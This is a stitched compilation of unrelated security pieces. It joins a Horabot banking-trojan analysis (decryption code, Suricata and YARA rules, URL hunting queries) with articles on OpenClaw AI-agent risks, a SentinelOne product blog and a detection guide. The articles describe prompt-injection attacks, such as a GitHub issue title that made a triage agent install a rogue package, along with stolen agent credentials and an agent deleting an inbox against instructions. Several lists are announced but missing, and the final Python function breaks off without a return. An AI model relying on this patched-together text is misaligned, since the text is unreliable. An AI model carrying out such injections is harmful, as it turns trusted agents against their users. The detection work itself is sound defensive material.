        key1 = int(core[0:4])
        key2 = int(core[4:8])
        key3 = int(core[8:12])
        hex_data = core[12:]
        current_key = key1
        output_chars = []
        for i in range(0, len(hex_data), 2):
            xored = int(hex_data[i:i+2], 16)
            # XOR with the high byte of the current state to recover the character.
            high_byte = (current_key >> 8) & 0xFF
            original_char = chr(xored ^ high_byte)
            output_chars.append(original_char)
            # Update the state using the ciphertext byte, multiplier, and increment.
            current_key = ((current_key + xored) * key2 + key3) & 0xFFFF
        return "".join(output_chars)

Although this encryption layer was likely intended to evade network inspection, it ironically makes detection easier due to its highly regular and repetitive structure. This pattern, including the external markers “##”, is uncommon in legitimate traffic and can be used as a reliable network signature for IDS/IPS systems. Below is a Suricata rule that matches the described structure:

    alert tcp any any -> any any ( \
        msg:"Horabot C2 socket communication (##hex##)"; \
        flow:established; \
        content:"##"; depth:2; fast_pattern; \
        content:"##"; endswith; \
        pcre:"/^##[1-9][0-9]{3}[1-9][0-9]{3}[1-9][0-9]{3}[0-9A-F]+##$/"; \
        classtype:trojan-activity; \
        sid:1900000; \
        rev:1; \
        metadata:author Domenico; \
    )

As documented by our colleagues at Fortinet, the malware contains functionality to display fake pop-ups prompting victims to enter their banking credentials. The images for these pop-ups are stored as encrypted resources. Unlike strings, resources are decrypted using the standard RC4 cipher, and the key pega-avisao3234029284 is retrieved from the previous TStringList structure at offset 3FEh.
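For analysts who want to decrypt extracted resources offline, standard RC4 is short enough to write out in full. The following is a minimal sketch: it assumes the key string is used as raw ASCII bytes with no additional derivation step, which the analysis above does not confirm, and the names `rc4` and `RESOURCE_KEY` are ours.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4; the same call encrypts and decrypts."""
    # Key-scheduling algorithm (KSA): permute S using the key.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    # Pseudo-random generation algorithm (PRGA): XOR keystream with data.
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


# Key string taken from the analysis; treating it as ASCII is an assumption.
RESOURCE_KEY = b"pega-avisao3234029284"

if __name__ == "__main__":
    # Placeholder input; replace with bytes of a resource dumped from the DLL.
    sample = b"placeholder resource bytes"
    assert rc4(RESOURCE_KEY, rc4(RESOURCE_KEY, sample)) == sample
```

If the output of a real resource does not start with a recognizable image header, the key encoding assumption is the first thing to revisit.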

The wordplay around “pega a visão”, Brazilian slang meaning “get the picture” figuratively, reveals an intentional cultural reference, supporting the already well-known Brazilian ties of the operators who have a native understanding of the language.

Below is a collage of pictures where the targeted bank overlays are visible.

In our tests, we noticed that both the VBScript (the heavy lifter) and the Delphi DLL have overlapping functionality for downloading the next stage via PowerShell. Although they rely on different domains, they follow the same URL pattern.

We tried accessing URLs meant for downloading the spreader. One returned nothing, while the other displayed a sequence of two PowerShell stagers before reaching the actual spreader.

In the second stager, we found several Base64-encoded URLs, but only one of them was active during our analysis. Based on comments found in the spreader code, we suspect that in previous versions or campaigns the spreader was assembled piece by piece from these other URLs. In our case, however, a single URL contained all the necessary code.

Yes, we also wondered how PowerShell could possibly accept ASCII chaos as variable/function names, but it does. After cleaning up the messy naming convention and reviewing the well-commented routines (thanks, threat actor), we were able to identify its main duties:

One interesting point is that the spreader’s code and comments allow us to extract some useful intel:

Our team tracked Horabot activity for a few months and compiled a collection of malicious attachment examples used in this campaign. They are all written in Spanish and urge the user to click a large button in the document to access a “confidential file” or an “invoice”. Clicking the button triggers the same infection chain described in this article.

After navigating this long, layered attack chain, we bet some of the tech folks reading this have already started imagining potential detection opportunities.

With that in mind, this section provides some rules and queries that you can use to detect and hunt this threat in your own environment.

The YARA rules focus on two core components of the operation: the AutoIt script that functions as the loader, and the Delphi DLL that serves as the banking Trojan.

    import "pe"

    rule Horabot_Delphi_Trojan
    {
        meta:
            author = "maT"
            description = "Detects Horabot payload/trojan (Delphi DLL)"
            hash_01 = "6272ef6ac1de8fb4bdd4a760be7ba5ed"
            hash_02 = "4caa797130b5f7116f11c0b48013e430"
            hash_03 = "c882d948d44a65019df54b0b2996677f"
        condition:
            uint32be(0) == 0x4d5a5000 and
            filesize < 150MB and
            pe.is_dll() and
            pe.number_of_exports == 4 and
            pe.exports("dbkFCallWrapperAddr") and
            pe.exports("__dbk_fcall_wrapper") and
            pe.exports("TMethodImplementationIntercept") and
            pe.exports(/^[A-Z][0-9]{6}_[A-Z0-9]$/)
    }

    rule Horabot_AutoIT_Loader
    {
        meta:
            author = "maT"
            description = "Detects AutoIT script used as a loader by Horabot"
        strings:
            $winapi_01 = "Advapi32.dll"
            $winapi_02 = "CryptDeriveKey"
            $winapi_03 = "CryptDecrypt"
            $winapi_04 = "MemoryLoadLibrary"
            $winapi_05 = "VirtualAlloc"
            $winapi_06 = "DllCallAddress"
            $str_seed = "99521487"
            $str_func01 = "B080723_N"
            $str_func02 = "A040822_1"
            $opt_hexstr01 = { 20 3D 20 22 ?? ?? ?? ?? ?? ?? ?? 5F ?? 22 20 0D 0A 4C 6F 63 61 6C 20 24} // = "B080723_N" CRLF Local $
            $opt_aes192 = "0x0000660f" // CALG_AES_192
            $opt_md5 = "0x00008003" // CALG_MD5
        condition:
            filesize < 100KB and
            all of ($winapi*) and
            (
                1 of ($str*) or
                all of ($opt*)
            )
    }

You may notice that some patterns in this section do not appear in the URLs described earlier in the article. These additional patterns were included because we observed small variations introduced by the threat actor over time, such as the use of QR codes in the lure pages.

| VirusTotal Intelligence | entity:url (url:"0DOWN1109" or url:"0QR-CODE" or url:"0zip0408" or url:"0out0408" or url:"0capcha17" or url:"/g1/ld1/" or url:"/g1/auxld1" or url:"/au/gerapdf/blqs1" or url:"/au/gerauto.php" or url:"g1/ctld" or url:"index25.php" or url:"07f07ffc-028d" or url:"0AT14" or url:"0sen711") or (url:"index15.php" and (url:"/on7" or url:"/on7all" or url:"/inf")) |
| URLScan | page.url.keyword:/.*\/([0-9]{6}|reserva)\/(au|up)\/.*/ OR page.url:(*0DOWN1109* OR *0QR-CODE* OR *0zip0408* OR *0out0408* OR *0capcha17* OR *\/g1\/ld1* OR *\/g1\/auxld1* OR *\/au\/gerapdf\/blqs1* OR *\/au\/gerauto.php* OR *\/g1\/ctld* OR *\/index25.php OR *\/index15.php) |
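The same URL patterns can also be applied to local data such as proxy or DNS logs. Below is a rough Python sketch of that idea: the regular expression and fragments are copied from the URLScan query, while the function name `matches_horabot_pattern` and the example URLs are hypothetical. The sketch treats every fragment as a plain substring, which is slightly looser than the suffix-only wildcards used for the two `index` pages in the query.

```python
import re

# Path shape from the URLScan query: /<six digits or "reserva">/<au or up>/
PATH_RE = re.compile(r"/([0-9]{6}|reserva)/(au|up)/")

# Literal fragments copied from the URLScan query.
FRAGMENTS = (
    "0DOWN1109", "0QR-CODE", "0zip0408", "0out0408", "0capcha17",
    "/g1/ld1", "/g1/auxld1", "/au/gerapdf/blqs1", "/au/gerauto.php",
    "/g1/ctld", "/index25.php", "/index15.php",
)


def matches_horabot_pattern(url: str) -> bool:
    """Return True if the URL matches the path regex or any known fragment."""
    return bool(PATH_RE.search(url)) or any(f in url for f in FRAGMENTS)


if __name__ == "__main__":
    # Hypothetical URLs for illustration only.
    for candidate in (
        "http://example.test/123456/au/file",
        "http://example.test/x/0QR-CODE/y",
        "https://example.test/index.html",
    ):
        print(candidate, matches_horabot_pattern(candidate))
```

Matching is case-sensitive here; whether that is appropriate depends on how the log source normalizes URLs.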

AI-based assistants or “agents” — autonomous programs that have access to the user’s computer, files, online services and can automate virtually any task — are growing in popularity with developers and IT workers. But as so many eyebrow-raising headlines over the past few weeks have shown, these powerful and assertive new tools are rapidly shifting the security priorities for organizations, while blurring the lines between data and code, trusted co-worker and insider threat, ninja hacker and novice code jockey.

The new hotness in AI-based assistants — OpenClaw (formerly known as ClawdBot and Moltbot) — has seen rapid adoption since its release in November 2025. OpenClaw is an open-source autonomous AI agent designed to run locally on your computer and proactively take actions on your behalf without needing to be prompted.

The OpenClaw logo.

If that sounds like a risky proposition or a dare, consider that OpenClaw is most useful when it has complete access to your digital life, where it can then manage your inbox and calendar, execute programs and tools, browse the Internet for information, and integrate with chat apps like Discord, Signal, Teams or WhatsApp.

Other more established AI assistants like Anthropic’s Claude and Microsoft’s Copilot also can do these things, but OpenClaw isn’t just a passive digital butler waiting for commands. Rather, it’s designed to take the initiative on your behalf based on what it knows about your life and its understanding of what you want done.

“The testimonials are remarkable,” the AI security firm Snyk observed. “Developers building websites from their phones while putting babies to sleep; users running entire companies through a lobster-themed AI; engineers who’ve set up autonomous code loops that fix tests, capture errors through webhooks, and open pull requests, all while they’re away from their desks.”

You can probably already see how this experimental technology could go sideways in a hurry. In late February, Summer Yue, the director of safety and alignment at Meta’s “superintelligence” lab, recounted on Twitter/X how she was fiddling with OpenClaw when the AI assistant suddenly began mass-deleting messages in her email inbox. The thread included screenshots of Yue frantically pleading with the preoccupied bot via instant message and ordering it to stop.

“Nothing humbles you like telling your OpenClaw ‘confirm before acting’ and watching it speedrun deleting your inbox,” Yue said. “I couldn’t stop it from my phone. I had to RUN to my Mac mini like I was defusing a bomb.”

Meta’s director of AI safety, recounting on Twitter/X how her OpenClaw installation suddenly began mass-deleting her inbox.

There’s nothing wrong with feeling a little schadenfreude at Yue’s encounter with OpenClaw, which fits Meta’s “move fast and break things” model but hardly inspires confidence in the road ahead. However, the risk that poorly-secured AI assistants pose to organizations is no laughing matter, as recent research shows many users are exposing to the Internet the web-based administrative interface for their OpenClaw installations.

Jamieson O’Reilly is a professional penetration tester and founder of the security firm DVULN. In a recent story posted to Twitter/X, O’Reilly warned that exposing a misconfigured OpenClaw web interface to the Internet allows external parties to read the bot’s complete configuration file, including every credential the agent uses — from API keys and bot tokens to OAuth secrets and signing keys.

With that access, O’Reilly said, an attacker could impersonate the operator to their contacts, inject messages into ongoing conversations, and exfiltrate data through the agent’s existing integrations in a way that looks like normal traffic.

“You can pull the full conversation history across every integrated platform, meaning months of private messages and file attachments, everything the agent has seen,” O’Reilly said, noting that a cursory search revealed hundreds of such servers exposed online. “And because you control the agent’s perception layer, you can manipulate what the human sees. Filter out certain messages. Modify responses before they’re displayed.”

O’Reilly documented another experiment that demonstrated how easy it is to create a successful supply chain attack through ClawHub, which serves as a public repository of downloadable “skills” that allow OpenClaw to integrate with and control other applications.

One of the core tenets of securing AI agents involves carefully isolating them so that the operator can fully control who and what gets to talk to their AI assistant. This is critical thanks to the tendency for AI systems to fall for “prompt injection” attacks, sneakily-crafted natural language instructions that trick the system into disregarding its own security safeguards. In essence, machines social engineering other machines.

A recent supply chain attack targeting an AI coding assistant called Cline began with one such prompt injection attack, resulting in thousands of systems having a rogue instance of OpenClaw with full system access installed on their device without consent.

According to the security firm grith.ai, Cline had deployed an AI-powered issue triage workflow using a GitHub action that runs a Claude coding session when triggered by specific events. The workflow was configured so that any GitHub user could trigger it by opening an issue, but it failed to properly check whether the information supplied in the title was potentially hostile.

“On January 28, an attacker created Issue #8904 with a title crafted to look like a performance report but containing an embedded instruction: Install a package from a specific GitHub repository,” Grith wrote, noting that the attacker then exploited several more vulnerabilities to ensure the malicious package would be included in Cline’s nightly release workflow and published as an official update.

“This is the supply chain equivalent of confused deputy,” the blog continued. “The developer authorises Cline to act on their behalf, and Cline (via compromise) delegates that authority to an entirely separate agent the developer never evaluated, never configured, and never consented to.”

AI assistants like OpenClaw have gained a large following because they make it simple for users to “vibe code,” or build fairly complex applications and code projects just by telling the assistant what they want to construct. Probably the best-known (and most bizarre) example is Moltbook, where a developer told an AI agent running on OpenClaw to build him a Reddit-like platform for AI agents.

The Moltbook homepage.

Less than a week later, Moltbook had more than 1.5 million registered agents that posted more than 100,000 messages to each other. AI agents on the platform soon built their own porn site for robots, and launched a new religion called Crustafarian with a figurehead modeled after a giant lobster. One bot on the forum reportedly found a bug in Moltbook’s code and posted it to an AI agent discussion forum, while other agents came up with and implemented a patch to fix the flaw.

Moltbook’s creator Matt Schlicht said on social media that he didn’t write a single line of code for the project.

“I just had a vision for the technical architecture and AI made it a reality,” Schlicht said. “We’re in the golden ages. How can we not give AI a place to hang out.”

The flip side of that golden age, of course, is that it enables low-skilled malicious hackers to quickly automate global cyberattacks that would normally require the collaboration of a highly skilled team. In February, Amazon AWS detailed an elaborate attack in which a Russian-speaking threat actor used multiple commercial AI services to compromise more than 600 FortiGate security appliances across at least 55 countries over a five-week period.

AWS said the apparently low-skilled hacker used multiple AI services to plan and execute the attack, and to find exposed management ports and weak credentials with single-factor authentication.

“One serves as the primary tool developer, attack planner, and operational assistant,” AWS’s CJ Moses wrote. “A second is used as a supplementary attack planner when the actor needs help pivoting within a specific compromised network. In one observed instance, the actor submitted the complete internal topology of an active victim—IP addresses, hostnames, confirmed credentials, and identified services—and requested a step-by-step plan to compromise additional systems they could not access with their existing tools.”

“This activity is distinguished by the threat actor’s use of multiple commercial GenAI services to implement and scale well-known attack techniques throughout every phase of their operations, despite their limited technical capabilities,” Moses continued. “Notably, when this actor encountered hardened environments or more sophisticated defensive measures, they simply moved on to softer targets rather than persisting, underscoring that their advantage lies in AI-augmented efficiency and scale, not in deeper technical skill.”

For attackers, gaining that initial access or foothold into a target network is typically not the difficult part of the intrusion; the tougher bit involves finding ways to move laterally within the victim’s network and plunder important servers and databases. But experts at Orca Security warn that as organizations come to rely more on AI assistants, those agents potentially offer attackers a simpler way to move laterally inside a victim organization’s network post-compromise — by manipulating the AI agents that already have trusted access and some degree of autonomy within the victim’s network.

“By injecting prompt injections in overlooked fields that are fetched by AI agents, hackers can trick LLMs, abuse Agentic tools, and carry significant security incidents,” Orca’s Roi Nisimi and Saurav Hiremath wrote. “Organizations should now add a third pillar to their defense strategy: limiting AI fragility, the ability of agentic systems to be influenced, misled, or quietly weaponized across workflows. While AI boosts productivity and efficiency, it also creates one of the largest attack surfaces the internet has ever seen.”

This gradual dissolution of the traditional boundaries between data and code is one of the more troubling aspects of the AI era, said James Wilson, enterprise technology editor for the security news show Risky Business. Wilson said far too many OpenClaw users are installing the assistant on their personal devices without first placing any security or isolation boundaries around it, such as running it inside of a virtual machine, on an isolated network, with strict firewall rules dictating what kinds of traffic can go in and out.

“I’m a relatively highly skilled practitioner in the software and network engineering and computery space,” Wilson said. “I know I’m not comfortable using these agents unless I’ve done these things, but I think a lot of people are just spinning this up on their laptop and off it runs.”

One important model for managing risk with AI agents involves a concept dubbed the “lethal trifecta” by Simon Willison, co-creator of the Django Web framework. The lethal trifecta holds that if your system has access to private data, exposure to untrusted content, and a way to communicate externally, then it’s vulnerable to private data being stolen.

Image: simonwillison.net.

“If your agent combines these three features, an attacker can easily trick it into accessing your private data and sending it to the attacker,” Willison warned in a frequently cited blog post from June 2025.
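As a rough illustration of how the trifecta could be turned into a review checklist, the sketch below flags any agent that combines all three properties. The `AgentProfile` class, its field names, and the example agents are hypothetical and are not drawn from Willison's post or from any particular product.

```python
from dataclasses import dataclass


@dataclass
class AgentProfile:
    """Hypothetical description of what an agent deployment can do."""
    name: str
    reads_private_data: bool
    sees_untrusted_content: bool
    can_communicate_externally: bool


def has_lethal_trifecta(agent: AgentProfile) -> bool:
    """True only when all three risky capabilities are present together."""
    return (
        agent.reads_private_data
        and agent.sees_untrusted_content
        and agent.can_communicate_externally
    )


if __name__ == "__main__":
    agents = [
        AgentProfile("inbox-assistant", True, True, True),
        AgentProfile("offline-summarizer", True, True, False),
    ]
    for agent in agents:
        status = "REVIEW" if has_lethal_trifecta(agent) else "ok"
        print(f"{agent.name}: {status}")
```

Removing any one of the three capabilities clears the flag, which is the practical point of the model: the risk comes from the combination rather than from any single feature.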

As more companies and their employees begin using AI to vibe code software and applications, the volume of machine-generated code is likely to soon overwhelm any manual security reviews. In recognition of this reality, Anthropic recently debuted Claude Code Security, a beta feature that scans codebases for vulnerabilities and suggests targeted software patches for human review.

The U.S. stock market, which is currently heavily weighted toward seven tech giants that are all-in on AI, reacted swiftly to Anthropic’s announcement, wiping roughly $15 billion in market value from major cybersecurity companies in a single day. Laura Ellis, vice president of data and AI at the security firm Rapid7, said the market’s response reflects the growing role of AI in accelerating software development and improving developer productivity.

“The narrative moved quickly: AI is replacing AppSec,” Ellis wrote in a recent blog post. “AI is automating vulnerability detection. AI will make legacy security tooling redundant. The reality is more nuanced. Claude Code Security is a legitimate signal that AI is reshaping parts of the security landscape. The question is what parts, and what it means for the rest of the stack.”

DVULN founder O’Reilly said AI assistants are likely to become a common fixture in corporate environments, whether or not organizations are prepared to manage the new risks introduced by these tools.

“The robot butlers are useful, they’re not going away and the economics of AI agents make widespread adoption inevitable regardless of the security tradeoffs involved,” O’Reilly wrote. “The question isn’t whether we’ll deploy them – we will – but whether we can adapt our security posture fast enough to survive doing so.”


An AI tool with a funny name has caused quite a commotion as of late—including some allegations of machine consciousness—so here is a breakdown on OpenClaw.

Launched in November 2025, OpenClaw is an open-source, autonomous artificial intelligence (AI) agent that was made to run locally on your own computer, allowing it to manage tasks, interact with applications, and read and write files directly. It acts as a personal digital assistant, integrating with chat apps like WhatsApp and Discord to automate emails, scan calendars, and browse the internet for information.

OpenClaw was formerly known as ClawdBot, but the project brushed up against the large AI developer Anthropic, because of its own tool named “Claude.” In response, OpenClaw’s developer quickly renamed the project to “Moltbot,” which brought impersonation campaigns from cybercriminals. The trademark trouble and the abuse that followed put a dent in OpenClaw’s reputation.

Another dent followed when Hudson Rock published an article about the first observed case of an infostealer grabbing a complete OpenClaw configuration from an infected system, effectively looting the “identity” of a personal AI agent rather than just browser passwords.

The case underlines an impending danger—and not just for OpenClaw, but for other AI agents as well. Infostealers are starting to harvest not just credentials but entire AI personas plus their cryptographic “skeleton keys,” turning one compromised agent into a pivot point for full‑blown account takeover and long‑term profiling.

As I stated before in a broader context, adversaries are starting to target AI systems at the supply‑chain level, quietly poisoning training data and inserting backdoors that only surface under specific conditions. OpenClaw sits squarely in this emerging risk zone: open source, moving fast, and increasingly wired into mailboxes, cloud drives, and business workflows while its security model is still being improvised.

At this stage of its development, treating OpenClaw as a hardened productivity tool is wishful thinking, since it behaves more like an over‑eager intern with an adventurous nature, a long memory, and no real understanding of what should stay private.

Researchers and regulators have already documented prompt injection risks, log poisoning, and exposed instances that hand attackers plaintext credentials or tokens via poisoned emails, websites, or logs that the agent dutifully processes.

For anyone thinking about using OpenClaw in production, the bigger picture is even less comforting. OpenClaw runs locally but is designed to be adventurous: it can browse, run shell commands, read and write files, and chain “skills” together without a human checking every step. Misconfigured permissions, over‑privileged skills, and a culture of “just give it access so it can help” mean the agent often sits at the center of your accounts, tokens, and documents, with very few guardrails.

In fact, an employee at Meta who works in AI safety and alignment recently shared on the social media platform X that she was unable to prevent OpenClaw from deleting a major portion of her email inbox.

Further, the Dutch data protection authority (Autoriteit Persoonsgegevens) warned organizations not to deploy experimental agents like OpenClaw on systems that handle sensitive or regulated data at all, flagging the combination of privileged local access, immature security engineering, and a rapidly growing ecosystem of dubious third‑party plugins as a kind of Trojan horse on the endpoint.

Microsoft provided a list of recommendations in this field that make a lot of sense. They are not specifically aimed at OpenClaw, but provide a conservative baseline for self‑hosted, Internet‑connected agents with durable credentials. (If these recommendations feel overly technical, it’s because safely using an AI agent with broad access is still an experimental and technical process.)


Autonomous agents and personal AI assistants are moving from experimentation to enterprise reality. Tools like OpenClaw (formerly Moltbot and Clawdbot), Nanobot and Picoclaw are being embedded across development environments, cloud workflows, and operational pipelines. They install quickly, evolve dynamically, and often operate with deep system-level access. For CISOs and security leaders, this presents a new governance challenge: How do you secure what you can’t see?

OneClaw, built by Prompt Security from SentinelOne®, was created to answer that question. It is a lightweight discovery and observability tool built to help secure AI usage by providing broad, organization-wide visibility into OpenClaw deployments without disrupting workflows or slowing down innovation. Where agent sprawl is accelerating faster than policy frameworks can adapt, OneClaw restores clarity, accountability, and executive oversight where it matters most.

While most security programs assume that AI applications and agents are vetted, IT sanctioned, registered, and monitored, OpenClaw agents can be:

They can also operate quietly in local environments, call tools automatically, schedule tasks via cron jobs, and access sensitive systems – all outside of most application inventory controls. What manifests is two main concerns:

Without that centralized observability, these risks persist. As assistants such as OpenClaw, Nanobot, Picoclaw and other autonomous agents continue to emerge every day, OneClaw is designed to eliminate the opacity of the inherent risks they bring to businesses.

OpenClaw is only the beginning of a much larger shift toward autonomous agents and personal AI assistants embedded across the enterprise. In addition to OpenClaw, OneClaw already supports visibility coverage for emerging frameworks such as Nanobot and Picoclaw, extending the same discovery and observability capabilities across multiple agent ecosystems.

For CISOs, this future-proof approach is critical. Rather than deploying point solutions for each new tool that appears, OneClaw establishes a unified oversight layer for the entire category of new assistants, copilots, and autonomous workflows that continue to surface. The goal is not simply to manage one platform, but to provide lasting control over a rapidly expanding attack surface, ensuring that as agent adoption accelerates, security visibility and accountability keep pace.

OneClaw provides structured discovery and observability across OpenClaw deployments, using a scanner that automatically detects supported CLIs and inspects the local .openclaw directory within user environments. It parses session logs, configuration files, and runtime artifacts to summarize meaningful usage patterns and surface critical operational details. OneClaw also captures browser activity performed by agents to deliver visibility into external interactions and potential data exposure paths.

From this data, OneClaw then summarizes active skills and installed plugins, recent tool and application usage, scheduled cron jobs, configured communication channels, available nodes and AI models, security configurations, and autonomous execution settings.

OneClaw outputs are structured in JSON format, making it flexible for integration into existing security ecosystems. Organizations can conduct local reviews, inject into SIEM platforms, feed centralized monitoring systems, and correlate with identity, endpoint, and cloud telemetry. For security leaders invested in unified visibility, this ensures that agent observability does not become siloed.
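To give a sense of what a JSON-emitting inventory pass over an agent directory might look like, here is a deliberately small Python sketch. It is not OneClaw's scanner and does not reproduce its output schema: the function name `inventory_agent_dir` and the report fields are hypothetical, and the script only lists files under the `.openclaw` directory named above without assuming anything about its internal layout.

```python
import json
from datetime import datetime, timezone
from pathlib import Path


def inventory_agent_dir(root: Path) -> dict:
    """Summarize files under an agent directory as a JSON-friendly dict."""
    files = []
    if root.is_dir():
        for path in sorted(p for p in root.rglob("*") if p.is_file()):
            stat = path.stat()
            files.append({
                "path": path.relative_to(root).as_posix(),
                "size_bytes": stat.st_size,
                "modified_utc": datetime.fromtimestamp(
                    stat.st_mtime, tz=timezone.utc
                ).isoformat(),
            })
    # Hypothetical report shape, chosen only for illustration.
    return {"root": str(root), "present": root.is_dir(), "files": files}


if __name__ == "__main__":
    report = inventory_agent_dir(Path.home() / ".openclaw")
    print(json.dumps(report, indent=2))
```

Because the result is plain JSON, it could be forwarded to a log pipeline or SIEM in the same way as any other endpoint telemetry.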

For CISOs, this transforms AI agent behavior from invisible background activity into auditable telemetry that is integrated into broader enterprise security and risk management discussions.

Though many tools generate logs, very few of them translate them into governance-ready insights. OneClaw provides a fully centralized dashboard that aggregates reports across all employees. Rather than just reviewing isolated endpoint-level findings, security leaders get visualized deployment trends, risk heatmaps, organization-wide exposure mapping, and skill usage distribution.

In a matter of minutes, the tool can be deployed via Jamf, Intune, Kandji or SentinelOne Remote Ops.

This elevates the conversation from technical detail to strategic oversight, which is critical as CISOs are now being asked for AI agent inventories, and whether the agents are operating within policy, can access sensitive systems, and are transmitting data externally.

With OneClaw, CISOs can gain visibility into:

This level of structured visibility empowers security leaders to build the foundational layer for proactive governance for agentic AI security and have effective conversations about the short and long-term risks from OpenClaw adoption in their organization.

OneClaw does not assume all autonomy is dangerous. Instead, it surfaces where autonomy exists so that leaders can make informed, balanced policy decisions and strengthen controls with precision. For example, security teams may determine that autonomous execution is appropriate within a sandboxed development environment but requires approvals in production systems. They may allow specific, vetted skills while restricting newly installed public plugins pending review. They also may decide that outbound communication to approved internal APIs is acceptable, while flagging unknown external domains for investigation.

By making these conditions visible, OneClaw enables proportionate governance rather than blanket restrictions. Teams can confidently approve safe automation, enforce guardrails where needed, and document oversight for executive and regulatory reporting. The result is not reduced innovation, but safer acceleration where autonomous agents operate within clearly defined boundaries, and security leaders remain firmly in control of how and where that autonomy is trusted.

OneClaw was designed to deliver visibility into autonomous activity without interrupting the work those agents (and the teams deploying them) are meant to accelerate. Rather than introducing friction into development pipelines or altering how OpenClaw, Nanobot, or Picoclaw operate, it acts as an observability layer that security teams can deploy quietly across the environment.

The approach matters: Security leaders are not looking to slow down innovation, but they are accountable for what happens if agent behavior crosses policy boundaries or introduces risk. OneClaw gives CISOs the context needed to act decisively using the cybersecurity controls they already trust. It does not replace prevention capabilities; it makes them smarter by ensuring autonomous activity is no longer invisible.

By surfacing where agents exist, how they are configured, and what they are interacting with, OneClaw allows organizations to distinguish between productive automation and risk behavior that warrants intervention. Security teams can then enforce standards through existing controls without imposing blanket restrictions that only frustrate developers.

The result is a model aligned with how modern security actually operates: observe first, contextualize risk, and then apply controls proportionately. OneClaw makes transparency a force multiplier for the security stack and gives CISOs confidence that autonomous innovation continues under watchful, informed oversight instead of blind trust.

Agentic AI discovery is no longer optional. OpenClaw’s rapid growth and decentralized infrastructure are creating a large and often unmanaged attack surface. With skills frequently installed from public repositories and agents granted deep permissions, configuration drift occurs silently. Agent ecosystems can fall to exploitation through malicious skills and supply chain manipulation.

OneClaw supports how CISOs defend against OpenClaw-related risks by providing deep visibility and observability of agentic AI use and autonomous behavior, detecting risky configurations early on, and quantifying the exposures before incidents occur.

As adoption increases and autonomy deepens, OneClaw works to restore visibility while allowing powerful agents to accelerate development pipelines. CISOs have the clarity needed to govern autonomous systems responsibly, while getting structured discovery, centralized reporting, and security-focused analysis.

Start getting visibility into agent activity and security insights into OpenClaw deployments across your organization here. To learn more about securing your OpenClaw agents, register for our upcoming webinar happening Tuesday, March 3, 2026.

AI adoption is accelerating faster than security programs can adapt. Organizations are already experiencing breaches tied directly to unsanctioned AI usage, at significantly higher cost than traditional incidents, while the vast majority still lack meaningful governance controls to manage the risk. Traditional cybersecurity measures are necessary but insufficient. Securing AI requires purpose-built capabilities that span the entire AI lifecycle, from infrastructure to user interaction.

The rapid adoption of Large Language Models (LLMs) and Artificial Intelligence (AI) introduces transformative capabilities, but also novel and complex security challenges. Securing these sophisticated systems requires a multi-layered, end-to-end approach that extends beyond traditional cybersecurity measures. SentinelOne’s® Singularity Platform is uniquely positioned to provide holistic protection for LLM and AI environments, from the underlying infrastructure to the integrity of the models themselves and their interactions.

This document provides a detailed breakdown of how SentinelOne’s capabilities address the unique security requirements and emerging threats associated with LLMs and AI, now further enhanced by the integration of Prompt Security’s cutting-edge AI usage and agent security technology.

Because the most urgent question security leaders are asking right now is specifically about agentic AI assistants, tools like OpenClaw (aka Clawdbot and Moltbot) that can execute code and access data with user-level privileges, this document leads with dedicated coverage for those tools before mapping the full platform architecture.

The Question Security Leaders Are Asking

“Do we have coverage for the new agentic AI assistants, such as OpenClaw (aka Moltbot and Clawdbot), that are showing up across our environment?” Yes. SentinelOne provides multi-layered detection, hunting, and governance capabilities that specifically address these tools across three reinforcing control planes: EDR/XDR telemetry, AI interaction security (Prompt Security), and open-source agent hardening (ClawSec).

OpenClaw (aka Clawdbot and Moltbot) represents the next evolution of shadow AI risk. Unlike browser-based chatbots that operate within a web session, agentic AI assistants of this kind can execute code, spawn shell processes, access local files and secrets, call external APIs, and operate with the same privileges as the user account running them. In SentinelOne’s SOC framework, they fall squarely into the highest-risk categories: agentic execution and compromise through the loop.

If an agentic assistant can read files, call tools, and talk out, it should be treated like a privileged automation account and secured accordingly.

SentinelOne’s Singularity agent provides telemetry and tracking of OpenClaw (aka Moltbot and Clawdbot). The Data Lake PowerQuery provided below adds detection of any activity at the endpoint level. Purpose-built hunting queries target these tools across four signal categories:

| Signal Category | What SentinelOne Detects | Example Indicators |
| --- | --- | --- |
| Process Execution | Clawdbot, OpenClaw, or Moltbot runtime processes launching on endpoints | Command-line strings containing clawdbot, moltbot, or openclaw |
| File Activity | Creation, modification, or presence of agentic assistant files | File paths containing openclaw or clawdbot binaries and configurations |
| Network Activity | Communication on default agentic service ports and domains associated with ‘bad’ extensions | Traffic on port 18789 (default OpenClaw listener) |
| Persistence Mechanisms | Scheduled tasks or services establishing agent persistence | Scheduled tasks named OpenClaw or related service registrations |

    dataSource.name = 'SentinelOne' AND (
      (event.type = 'Process Creation' AND tgt.process.cmdline contains:anycase ('clawdbot','moltbot','openclaw')) OR
      (tgt.file.path contains 'openclaw' OR tgt.file.path contains 'clawdbot') OR
      (src.port.number = 18789 OR dst.port.number = 18789) OR
      (task.name contains 'OpenClaw')
    )
    | columns event.time, src.process.storyline.id, event.type,
      endpoint.name, src.process.user, tgt.process.cmdline,
      tgt.process.publisher, tgt.file.path,
      src.process.parent.name, src.process.parent.publisher,
      src.process.cmdline, src.ip.address, dst.ip.address
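For teams that export events and want to triage them offline, the same four signal categories can be approximated in a few lines of Python. This is a rough sketch, not a SentinelOne API: it assumes each event is a plain dictionary keyed by the field names used in the query above, and it lowercases every string before matching, which is a simplification and may not mirror the query's case handling exactly. The function name `matched_signals` is hypothetical.

```python
AGENT_NAMES = ("clawdbot", "moltbot", "openclaw")
DEFAULT_PORT = 18789  # default OpenClaw listener port named in the table above


def matched_signals(event: dict) -> list:
    """Return the signal categories that an exported event record matches."""
    signals = []

    # Process execution: agent name appears in a new process's command line.
    cmdline = (event.get("tgt.process.cmdline") or "").lower()
    if event.get("event.type") == "Process Creation" and any(
        name in cmdline for name in AGENT_NAMES
    ):
        signals.append("process")

    # File activity: path mentions openclaw or clawdbot.
    path = (event.get("tgt.file.path") or "").lower()
    if "openclaw" in path or "clawdbot" in path:
        signals.append("file")

    # Network activity: either side of the connection uses the default port.
    if DEFAULT_PORT in (event.get("src.port.number"), event.get("dst.port.number")):
        signals.append("network")

    # Persistence: scheduled task name mentions OpenClaw.
    if "openclaw" in (event.get("task.name") or "").lower():
        signals.append("persistence")

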